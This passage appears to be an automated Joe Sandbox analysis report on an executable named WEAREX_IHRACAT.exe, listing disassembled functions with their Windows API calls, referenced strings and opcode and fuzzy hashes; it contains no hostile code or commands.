                          • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                          • Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59
                          APIs
                          • lstrlenW.KERNEL32(?), ref: 10002391
                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100023B2
                          • CLSIDFromString.OLE32(?,00000000), ref: 100023BF
                          • GlobalAlloc.KERNEL32(00000040), ref: 100023DD
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023F8
                          • GlobalFree.KERNEL32(00000000), ref: 1000241A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2459321793.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10000000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Global$Alloc$ByteCharFreeFromMultiStringWidelstrlen
                          • String ID:
                          • API String ID: 3579998418-0
                          • Opcode ID: 0bd45a36e3cf99e0ea36bafafcae9cc199b85f388ee9b7374409e80a5249356b
                          • Instruction ID: d73bd5747cd055fead3767a403609930cc226346ea8e15a1dc9f8d9e67d80713
                          • Opcode Fuzzy Hash: 0bd45a36e3cf99e0ea36bafafcae9cc199b85f388ee9b7374409e80a5249356b
                          • Instruction Fuzzy Hash: AC419FB4504706EFF324DF249C94A6A77ECFB443D0F11892DF98AC6199CB34AA94CB61
                          APIs
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002167,?,00000808), ref: 1000162F
                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002167,?,00000808), ref: 10001636
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002167,?,00000808), ref: 1000164A
                          • GetProcAddress.KERNEL32(10002167,00000000), ref: 10001651
                          • GlobalFree.KERNEL32(00000000), ref: 1000165A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2459321793.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10000000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                          • String ID:
                          • API String ID: 1148316912-0
                          • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                          • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                          • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                          • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                          APIs
                          • GetDlgItem.USER32(?,?), ref: 00401CEB
                          • GetClientRect.USER32(00000000,?), ref: 00401CF8
                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                          • DeleteObject.GDI32(00000000), ref: 00401D36
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                          • String ID:
                          • API String ID: 1849352358-0
                          • Opcode ID: 20e8b1827cccb196a4384b85b1888191a2ee07b8269210f181c49f722f18a9f7
                          • Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
                          • Opcode Fuzzy Hash: 20e8b1827cccb196a4384b85b1888191a2ee07b8269210f181c49f722f18a9f7
                          • Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39
                          APIs
                          • GetDC.USER32(?), ref: 00401D44
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                          • ReleaseDC.USER32(?,00000000), ref: 00401D71
                          • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: CapsCreateDeviceFontIndirectRelease
                          • String ID:
                          • API String ID: 3808545654-0
                          • Opcode ID: de03f2b16b471deeb75989a648f0339490e64a22e039540fc3332c447546e770
                          • Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
                          • Opcode Fuzzy Hash: de03f2b16b471deeb75989a648f0339490e64a22e039540fc3332c447546e770
                          • Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E
                          APIs
                          • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
                          • wsprintfW.USER32 ref: 00404A10
                          • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: ItemTextlstrlenwsprintf
                          • String ID: %u.%u%s%s
                          • API String ID: 3540041739-3551169577
                          • Opcode ID: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                          • Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
                          • Opcode Fuzzy Hash: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                          • Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC
                          APIs
                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: MessageSend$Timeout
                          • String ID: !
                          • API String ID: 1777923405-2657877971
                          • Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                          • Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
                          • Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                          • Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19
                          APIs
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405DDF
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E00
                          • RegCloseKey.ADVAPI32(?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E23
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: Call
                          • API String ID: 3677997916-1824292864
                          • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                          • Instruction ID: afa83f24152e7e9ce060601fd796842ff4531c7984e311905aa048a3366a239a
                          • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                          • Instruction Fuzzy Hash: DC011A3115020AEADB218F56ED09EEB3BA8EF85354F00403AF945D6260D335DA64DBF9
                          APIs
                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 00405939
                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 00405943
                          • lstrcatW.KERNEL32(?,00409014), ref: 00405955
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405933
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: CharPrevlstrcatlstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 2659869361-3355392842
                          • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                          • Instruction ID: 44c8f02d27920c7d59b6ae10536407caccd7e36c496fb0f87730dad2d93a7b21
                          • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                          • Instruction Fuzzy Hash: FFD05261101920AAC222AB488C04D9B67ACEE86301340002AF201B20A2CB7C2E428BFE
                          APIs
                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                          • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                            • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                          • String ID:
                          • API String ID: 1404258612-0
                          • Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                          • Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
                          • Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                          • Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68
                          APIs
                          • IsWindowVisible.USER32(?), ref: 00405135
                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405186
                            • Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Window$CallMessageProcSendVisible
                          • String ID:
                          • API String ID: 3748168415-3916222277
                          • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                          • Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
                          • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                          • Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A
                          APIs
                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,752C2EE0,004037F4,752C3420,0040361F,?), ref: 00403837
                          • GlobalFree.KERNEL32(?), ref: 0040383E
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040382F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Free$GlobalLibrary
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 1100898210-3355392842
                          • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                          • Instruction ID: 46cd0999c48b818ae3c50a5e697a2c548effd71f48cd6e5996984714d7197a8e
                          • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                          • Instruction Fuzzy Hash: 01E0C23390503057C7316F14ED05B1ABBE86F89B22F014076F9417B7A183746C528BED
                          APIs
                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\WEAREX_IHRACAT.exe,C:\Users\user\Desktop\WEAREX_IHRACAT.exe,80000000,00000003), ref: 00405985
                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\WEAREX_IHRACAT.exe,C:\Users\user\Desktop\WEAREX_IHRACAT.exe,80000000,00000003), ref: 00405995
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: CharPrevlstrlen
                          • String ID: C:\Users\user\Desktop
                          • API String ID: 2709904686-3370423016
                          • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                          • Instruction ID: 052b7d625f743090f45407db0d4342bedadcdb208645d65a5e8033f28458e035
                          • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                          • Instruction Fuzzy Hash: 4DD05EB2400A20DAD3226B08DC009AFB3ACEF113107464466F841A21A5D7786D818BE9
                          APIs
                            • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                            • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                          • GlobalFree.KERNEL32(?), ref: 10001203
                          Memory Dump Source
                          • Source File: 00000000.00000002.2459321793.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10000000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Global$Free$Alloclstrcpy
                          • String ID:
                          • API String ID: 852173138-0
                          • Opcode ID: 45a5d3319c716c3518dc5b77d0b954dd710989e410c13165b505e15e89ce8376
                          • Instruction ID: c8ae98bcc35e74d2b72c58860f7bdf59a74f39180ec1ffd54fa0f92d9f30571b
                          • Opcode Fuzzy Hash: 45a5d3319c716c3518dc5b77d0b954dd710989e410c13165b505e15e89ce8376
                          • Instruction Fuzzy Hash: 5E3190F6904211AFF314CF64DC859EA77E8EB853D0B124529FB41E726CEB34E8018765
                          APIs
                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                          • lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
                          • CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
                          • lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: lstrlen$CharNextlstrcmpi
                          • String ID:
                          • API String ID: 190613189-0
                          • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                          • Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
                          • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                          • Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9